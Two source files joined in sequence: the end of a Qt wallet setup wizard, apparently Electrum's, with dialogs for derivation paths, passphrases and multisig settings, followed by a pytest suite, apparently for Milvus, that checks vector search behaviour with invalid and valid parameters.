clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def derivation_and_script_type_gui_specific_dialog(
self,
*,
title: str,
message1: str,
choices: List[Tuple[str, str, str]],
hide_choices: bool = False,
message2: str,
test_text: Callable[[str], int],
run_next,
default_choice_idx: int = 0,
get_account_xpub=None,
) -> Tuple[str, str]:
vbox = QVBoxLayout()
if get_account_xpub:
button = QPushButton(_("Detect Existing Accounts"))
def on_account_select(account):
script_type = account["script_type"]
if script_type == "p2pkh":
script_type = "standard"
button_index = c_values.index(script_type)
button = clayout.group.buttons()[button_index]
button.setChecked(True)
line.setText(account["derivation_path"])
button.clicked.connect(lambda: Bip39RecoveryDialog(self, get_account_xpub, on_account_select))
vbox.addWidget(button, alignment=Qt.AlignLeft)
vbox.addWidget(QLabel(_("Or")))
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
if not hide_choices:
vbox.addLayout(clayout.layout())
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(
xpub,
title=msg,
icon=False,
for_seed_words=False,
config=self.config,
)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network: 'Network'):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
self.config.set_key('auto_connect', network.auto_connect, True)
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
backup_warning_label.setVisible(cw.m != cw.n)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
backup_warning_label.setVisible(cw.m != cw.n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
vbox.addSpacing(2 * char_width_in_lineedit())
backup_warning_label = WWLabel(_("Warning: to be able to restore a multisig wallet, "
"you should include the master public key for each cosigner "
"in all of your backups."))
vbox.addWidget(backup_warning_label)
on_n(2)
on_m(2)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
test_search_20.py | import pytest
from time import sleep
from base.client_base import TestcaseBase
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from utils.utils import *
from common.constants import *
prefix = "search_collection"
search_num = 10
max_dim = ct.max_dim
epsilon = ct.epsilon
gracefulTime = ct.gracefulTime
default_nb = ct.default_nb
default_nb_medium = ct.default_nb_medium
default_nq = ct.default_nq
default_dim = ct.default_dim
default_limit = ct.default_limit
default_search_exp = "int64 >= 0"
default_search_field = ct.default_float_vec_field_name
default_search_params = ct.default_search_params
default_int64_field_name = ct.default_int64_field_name
default_float_field_name = ct.default_float_field_name
default_bool_field_name = ct.default_bool_field_name
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
uid = "test_search"
nq = 1
epsilon = 0.001
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
search_param = {"nprobe": 1}
entity = gen_entities(1, is_normal=True)
entities = gen_entities(default_nb, is_normal=True)
raw_vectors, binary_entities = gen_binary_entities(default_nb)
default_query, _ = gen_search_vectors_params(field_name, entities, default_top_k, nq)
# default_binary_query, _ = gen_search_vectors_params(binary_field_name, binary_entities, default_top_k, nq)
class TestCollectionSearchInvalid(TestcaseBase):
""" Test case of search interface """
@pytest.fixture(scope="function", params=ct.get_invalid_vectors)
def get_invalid_vectors(self, request):
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_fields_type(self, request):
if isinstance(request.param, str):
pytest.skip("string is valid type for field")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_fields_value(self, request):
if not isinstance(request.param, str):
pytest.skip("field value only support string")
if request.param == "":
pytest.skip("empty field is valid")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_metric_type(self, request):
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_ints)
def get_invalid_limit(self, request):
if isinstance(request.param, int) and request.param >= 0:
pytest.skip("positive int is valid type for limit")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_expr_type(self, request):
if isinstance(request.param, str):
pytest.skip("string is valid type for expr")
if request.param is None:
pytest.skip("None is valid for expr")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_expr_value(self, request):
if not isinstance(request.param, str):
pytest.skip("expression value only support string")
if request.param == "":
pytest.skip("empty field is valid")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_partition(self, request):
if request.param == []:
pytest.skip("empty is valid for partition")
if request.param is None:
pytest.skip("None is valid for partition")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_output_fields(self, request):
if request.param == []:
pytest.skip("empty is valid for output_fields")
if request.param is None:
pytest.skip("None is valid for output_fields")
yield request.param
"""
******************************************************************
# The followings are invalid cases
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_search_no_connection(self):
"""
target: test search without connection
method: create and delete connection, then search
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. remove connection
log.info("test_search_no_connection: removing connection")
self.connection_wrap.remove_connection(alias='default')
log.info("test_search_no_connection: removed connection")
# 3. search without connection
log.info("test_search_no_connection: searching without connection")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "should create connect first"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_no_collection(self):
"""
target: test the scenario which search the non-exist collection
method: 1. create collection
2. drop collection
3. search the dropped collection
expected: raise exception and report the error
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
# 2. Drop collection
collection_w.drop()
# 3. Search without collection
log.info("test_search_no_collection: Searching without collection ")
collection_w.search(vectors, default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "collection %s doesn't exist!" % collection_w.name})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_missing(self):
"""
target: test search with incomplete parameters
method: search with incomplete parameters
expected: raise exception and report the error
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
# 2. search collection with missing parameters
log.info("test_search_param_missing: Searching collection %s "
"with missing parameters" % collection_w.name)
try:
collection_w.search()
except TypeError as e:
assert "missing 4 required positional arguments: 'data', " \
"'anns_field', 'param', and 'limit'" in str(e)
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_vectors(self, get_invalid_vectors):
"""
target: test search with invalid parameter values
method: search with invalid data
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_vectors = get_invalid_vectors
log.info("test_search_param_invalid_vectors: searching with "
"invalid vectors: {}".format(invalid_vectors))
collection_w.search(invalid_vectors, default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "`search_data` value {} is illegal".format(invalid_vectors)})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_dim(self):
"""
target: test search with invalid parameter values
method: search with invalid dim
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search with invalid dim
log.info("test_search_param_invalid_dim: searching with invalid dim")
wrong_dim = 129
vectors = [[random.random() for _ in range(wrong_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "The dimension of query entities "
"is different from schema"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_field_type(self, get_invalid_fields_type):
"""
target: test search with invalid parameter type
method: search with invalid field type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_search_field = get_invalid_fields_type
log.info("test_search_param_invalid_field_type: searching with "
"invalid field: %s" % invalid_search_field)
collection_w.search(vectors[:default_nq], invalid_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "`anns_field` value {} is illegal".format(invalid_search_field)})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_field_value(self, get_invalid_fields_value):
"""
target: test search with invalid parameter values
method: search with invalid field value
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_search_field = get_invalid_fields_value
log.info("test_search_param_invalid_field_value: searching with "
"invalid field: %s" % invalid_search_field)
collection_w.search(vectors[:default_nq], invalid_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Field %s doesn't exist in schema"
% invalid_search_field})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_metric_type(self, get_invalid_metric_type):
"""
target: test search with invalid parameter values
method: search with invalid metric type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True, 10)[0]
# 2. search with invalid metric_type
log.info("test_search_param_invalid_metric_type: searching with invalid metric_type")
invalid_metric = get_invalid_metric_type
search_params = {"metric_type": invalid_metric, "params": {"nprobe": 10}}
collection_w.search(vectors[:default_nq], default_search_field, search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "metric type not found"})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_invalid_params_type(self, index, params):
"""
target: test search with invalid search params
method: test search with invalid params type
expected: raise exception and report the error
"""
if index == "FLAT":
pytest.skip("skip in FLAT index")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 5000,
is_index=True)[0:4]
# 2. create index and load
default_index = {"index_type": index, "params": params, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search
invalid_search_params = cf.gen_invaild_search_params_type()
message = "Search params check failed"
for invalid_search_param in invalid_search_params:
if index == invalid_search_param["index_type"]:
search_params = {"metric_type": "L2", "params": invalid_search_param["search_params"]}
collection_w.search(vectors[:default_nq], default_search_field,
search_params, default_limit,
default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 0,
"err_msg": message})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_limit_type(self, get_invalid_limit):
"""
target: test search with invalid limit type
method: search with invalid limit type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_limit = get_invalid_limit
log.info("test_search_param_invalid_limit_type: searching with "
"invalid limit: %s" % invalid_limit)
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
invalid_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "`limit` value %s is illegal" % invalid_limit})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("limit", [0, 16385])
def test_search_param_invalid_limit_value(self, limit):
"""
target: test search with invalid limit value
method: search with invalid limit: 0 and maximum
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid limit (topK)
log.info("test_search_param_invalid_limit: searching with "
"invalid limit (topK) = %s" % limit)
err_msg = "limit %d is too large!" % limit
if limit == 0:
err_msg = "`limit` value 0 is illegal"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_expr_type(self, get_invalid_expr_type):
"""
target: test search with invalid parameter type
method: search with invalid search expressions
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2 search with invalid expr
invalid_search_expr = get_invalid_expr_type
log.info("test_search_param_invalid_expr_type: searching with "
"invalid expr: {}".format(invalid_search_expr))
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, invalid_search_expr,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "The type of expr must be string ,"
"but {} is given".format(type(invalid_search_expr))})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_expr_value(self, get_invalid_expr_value):
"""
target: test search with invalid parameter values
method: search with invalid search expressions
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2 search with invalid expr
invalid_search_expr = get_invalid_expr_value
log.info("test_search_param_invalid_expr_value: searching with "
"invalid expr: %s" % invalid_search_expr)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, invalid_search_expr,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "invalid expression %s"
% invalid_search_expr})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_invalid_type(self, get_invalid_partition):
"""
target: test search invalid partition
method: search with invalid partition type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search the invalid partition
partition_name = get_invalid_partition
err_msg = "`partition_name_array` value {} is illegal".format(partition_name)
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, partition_name,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields_invalid_type(self, get_invalid_output_fields):
"""
target: test search with output fields
method: search with invalid output_field
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search
log.info("test_search_with_output_fields_invalid_type: Searching collection %s" % collection_w.name)
output_fields = get_invalid_output_fields
err_msg = "`output_fields` value {} is illegal".format(output_fields)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=output_fields,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: err_msg})
@pytest.mark.tags(CaseLabel.L1)
def test_search_release_collection(self):
"""
target: test the scenario which search the released collection
method: 1. create collection
2. release collection
3. search the released collection
expected: raise exception and report the error
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix, True, 10)[0]
# 2. release collection
collection_w.release()
# 3. Search the released collection
log.info("test_search_release_collection: Searching without collection ")
collection_w.search(vectors, default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "collection %s was not loaded "
"into memory" % collection_w.name})
@pytest.mark.tags(CaseLabel.L2)
def test_search_release_partition(self):
"""
target: test the scenario which search the released collection
method: 1. create collection
2. release partition
3. search with specifying the released partition
expected: raise exception and report the error
"""
# 1. initialize with data
partition_num = 1
collection_w = self.init_collection_general(prefix, True, 10, partition_num)[0]
par = collection_w.partitions
par_name = par[partition_num].name
# 2. release partition
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par_name])
# 3. Search the released partition
log.info("test_search_release_partition: Searching specifying the released partition")
limit = 10
collection_w.search(vectors, default_search_field,
default_search_params, limit, default_search_exp,
[par_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "partition has been released"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_empty_collection(self):
"""
target: test search with empty connection
method: 1. search the empty collection before load
2. search the empty collection after load
3. search collection with data inserted but not load again
expected: 1. raise exception if not loaded
2. return topk=0 if loaded
3. return topk successfully
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
# 2. search collection without data before load
log.info("test_search_with_empty_collection: Searching empty collection %s"
% collection_w.name)
err_msg = "collection" + collection_w.name + "was not loaded into memory"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, timeout=1,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
# 3. search collection without data after load
collection_w.load()
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": [],
"limit": 0})
# 4. search with data inserted but not load again
data = cf.gen_default_dataframe_data(nb=2000)
insert_res, _ = collection_w.insert(data)
sleep(1)
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_res.primary_keys,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L1)
def test_search_partition_deleted(self):
"""
target: test search deleted partition
method: 1. search the collection
2. delete a partition
3. search the deleted partition
expected: raise exception and report the error
"""
# 1. initialize with data
partition_num = 1
collection_w = self.init_collection_general(prefix, True, 1000, partition_num)[0]
# 2. delete partitions
log.info("test_search_partition_deleted: deleting a partition")
par = collection_w.partitions
deleted_par_name = par[partition_num].name
collection_w.drop_partition(deleted_par_name)
log.info("test_search_partition_deleted: deleted a partition")
collection_w.load()
# 3. search after delete partitions
log.info("test_search_partition_deleted: searching deleted partition")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
[deleted_par_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "PartitonName: %s not found" % deleted_par_name})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 6731")
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_different_index_invalid_params(self, index, params):
"""
target: test search with different index
method: test search with different index
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 5000,
partition_num=1,
is_index=True)[0:4]
# 2. create different index
if params.get("m"):
if (default_dim % params["m"]) != 0:
params["m"] = default_dim // 4
log.info("test_search_different_index_invalid_params: Creating index-%s" % index)
default_index = {"index_type": index, "params": params, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
log.info("test_search_different_index_invalid_params: Created index-%s" % index)
collection_w.load()
# 3. search
log.info("test_search_different_index_invalid_params: Searching after creating index-%s" % index)
collection_w.search(vectors, default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L1)
def test_search_index_partition_not_existed(self):
"""
target: test search not existed partition
method: search with not existed partition
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 3. search the non exist partition
partition_name = "search_non_exist"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, [partition_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "PartitonName: %s not found" % partition_name})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_binary(self):
"""
target: test search within binary data (invalid parameter)
method: search with wrong metric type
expected: raise exception and report the error
"""
# 1. initialize with binary data
collection_w = self.init_collection_general(prefix, True, is_binary=True)[0]
# 2. create index
default_index = {"index_type": "BIN_IVF_FLAT", "params": {"nlist": 128}, "metric_type": "JACCARD"}
collection_w.create_index("binary_vector", default_index)
# 3. search with exception
binary_vectors = cf.gen_binary_vectors(3000, default_dim)[1]
wrong_search_params = {"metric_type": "L2", "params": {"nprobe": 10}}
collection_w.search(binary_vectors[:default_nq], "binary_vector", wrong_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "unsupported"})
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_flat_with_L2(self):
"""
target: search binary collection using FlAT with L2
method: search binary collection using FLAT with L2
expected: raise exception and report error
"""
# 1. initialize with binary data
collection_w = self.init_collection_general(prefix, True, is_binary=True)[0]
# 2. search and assert
query_raw_vector, binary_vectors = cf.gen_binary_vectors(2, default_dim)
search_params = {"metric_type": "L2", "params": {"nprobe": 10}}
collection_w.search(binary_vectors[:default_nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Search failed"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_output_fields_not_exist(self):
"""
target: test search with output fields
method: search with non-exist output_field
expected: raise exception
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True)[0:4]
# 2. search
log.info("test_search_with_output_fields_not_exist: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=["int63"],
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: 'Field int63 not exist'})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("output_fields", [[default_search_field], ["%"]])
def test_search_output_field_vector(self, output_fields):
"""
target: test search with vector as output field
method: search with one vector output_field or
wildcard for vector
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search
log.info("test_search_output_field_vector: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=output_fields,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Search doesn't support "
"vector field as output_fields"})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("output_fields", [["*%"], ["**"], ["*", "@"]])
def test_search_output_field_invalid_wildcard(self, output_fields):
"""
target: test search with invalid output wildcard
method: search with invalid output_field wildcard
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search
log.info("test_search_output_field_vector: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=output_fields,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": f"Field {output_fields[-1]} not exist"})
class TestCollectionSearch(TestcaseBase):
""" Test case of search interface """
@pytest.fixture(scope="function",
params=[default_nb, default_nb_medium])
def nb(self, request):
yield request.param
@pytest.fixture(scope="function", params=[2, 500])
def nq(self, request):
yield request.param
@pytest.fixture(scope="function", params=[8, 128])
def dim(self, request):
yield request.param
@pytest.fixture(scope="function", params=[False, True])
def auto_id(self, request):
yield request.param
@pytest.fixture(scope="function", params=[False, True])
def _async(self, request):
yield request.param
"""
******************************************************************
# The following are valid base cases
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_search_normal(self, nq, dim, auto_id):
"""
target: test search normal case
method: create connection, collection, insert and search
expected: 1. search returned with 0 before travel timestamp
2. search successfully with limit(topK) after travel timestamp
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = \
self.init_collection_general(prefix, True, auto_id=auto_id, dim=dim)[0:5]
# 2. search before insert time_stamp
log.info("test_search_normal: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
travel_timestamp=time_stamp-1,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": [],
"limit": 0})
# 3. search after insert time_stamp
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tag(CaseLabel.L0)
def test_search_with_hit_vectors(self, nq, dim, auto_id):
"""
target: test search with vectors in collections
method: create connections,collection insert and search vectors in collections
expected: search successfully with limit(topK) and can be hit at top 1 (min distance is 0)
"""
collection_w, _vectors, _, insert_ids = \
self.init_collection_general(prefix, True, auto_id=auto_id, dim=dim)[0:4]
# get vectors that inserted into collection
vectors = np.array(_vectors[0]).tolist()
vectors = [vectors[i][-1] for i in range(nq)]
log.info("test_search_with_hit_vectors: searching collection %s" % collection_w.name)
search_res, _ = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit})
log.info("test_search_with_hit_vectors: checking the distance of top 1")
for hits in search_res:
# verify that top 1 hit is itself,so min distance is 0
assert hits.distances[0] == 0.0
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_dup_primary_key(self, dim, auto_id, _async):
"""
target: test search with duplicate primary key
method: 1.insert same data twice
2.search
expected: search results are de-duplicated
"""
# initialize with data
nb = ct.default_nb
nq = ct.default_nq
collection_w, insert_data, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:4]
# insert data again
insert_res, _ = collection_w.insert(insert_data[0])
insert_ids.extend(insert_res.primary_keys)
# search
vectors = [[random.random() for _ in range(dim)]
for _ in range(default_nq)]
search_res, _ = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
if _async:
search_res.done()
search_res = search_res.result()
# assert that search results are de-duplicated
for hits in search_res:
ids = hits.ids
assert sorted(list(set(ids))) == sorted(ids)
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_empty_vectors(self, dim, auto_id, _async):
"""
target: test search with empty query vector
method: search using empty query vector
expected: search successfully with 0 results
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix, True,
auto_id=auto_id, dim=dim)[0]
# 2. search collection without data
log.info("test_search_with_empty_vectors: Searching collection %s "
"using empty vector" % collection_w.name)
collection_w.search([], default_search_field, default_search_params,
default_limit, default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": 0,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("search_params", [{}, {"params": {}}, {"params": {"nprobe": 10}}])
def test_search_normal_default_params(self, dim, auto_id, search_params, _async):
"""
target: test search normal case
method: create connection, collection, insert and search
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids = \
self.init_collection_general(prefix, True, auto_id=auto_id, dim=dim)[0:4]
# 2. search
log.info("test_search_normal: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
search_params, default_limit,
default_search_exp, _async=_async,
travel_timestamp=0,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
